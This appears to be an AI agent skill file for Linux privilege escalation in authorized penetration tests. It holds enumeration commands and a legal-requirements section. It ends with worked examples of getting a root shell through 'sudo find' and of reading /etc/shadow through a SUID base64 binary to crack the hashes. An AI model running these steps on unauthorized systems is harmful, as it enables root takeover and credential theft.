This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
Inputs / Prerequisites
Required Access
Low-privilege shell access to target Linux system
Ability to execute commands (interactive or semi-interactive shell)
Network access for reverse shell connections (if needed)
Attacker machine for payload hosting and receiving shells
Technical Requirements
Understanding of Linux filesystem permissions and ownership
Familiarity with common Linux utilities and scripting
Knowledge of kernel versions and associated vulnerabilities
Basic understanding of compilation (gcc) for custom exploits
Recommended Tools
LinPEAS, LinEnum, or Linux Smart Enumeration scripts
Linux Exploit Suggester (LES)
GTFOBins reference for binary exploitation
John the Ripper or Hashcat for password cracking
Netcat or similar for reverse shells
Outputs / Deliverables
Primary Outputs
Root shell access on target system
Privilege escalation path documentation
System enumeration findings report
Recommendations for remediation
Evidence Artifacts
Screenshots of successful privilege escalation
Command output logs demonstrating root access
Identified vulnerability details
Exploited configuration files
Core Workflow
Phase 1: System Enumeration
Basic System Information
Gather fundamental system details for vulnerability research:
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
User and Permission Enumeration
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
Network Information
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
Process and Service Enumeration
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
Hardened systems may have restricted sudo configurations
Legal and Ethical Requirements
Written authorization required before testing
Stay within defined scope boundaries
Report critical findings immediately
Do not access data beyond scope requirements
Examples
Example 1: Sudo to Root via find
Scenario: User has sudo rights for find command
$ sudo -l
User user may run the following commands:
(root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
Example 2: SUID base64 for Shadow Access
Scenario: base64 binary has SUID bit set
$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64
$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::
# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt